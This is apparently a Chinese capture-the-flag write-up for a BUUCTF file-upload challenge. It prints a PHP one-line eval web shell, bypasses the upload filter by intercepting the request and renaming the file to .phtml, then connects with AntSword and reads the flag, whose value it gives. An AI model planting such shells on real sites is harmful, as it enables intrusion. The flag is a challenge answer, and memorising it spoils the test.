1.打开题目,先上传一句话木马试试。
<script language='php'>@eval($_POST['love']);</script>
按照传统方法,现将一句话木马利用windows文件后缀识别的特点,将后缀名改为图片后缀名。 上传,抓包改包!
改为phtml后缀
上传成功,构架url用蚁剑连接。
http://5081ca11-6534-49bf-8f3b-94c45fc9946e.node4.buuoj.cn:81/uplo4d/38a64fe21fe9be37660dc7a0efeb27d6.phtml
打开终端
使用cat /flag
显示flag文件
flag{5d5d2e07-0ea5-4a2f-9635-8126c19a30a0}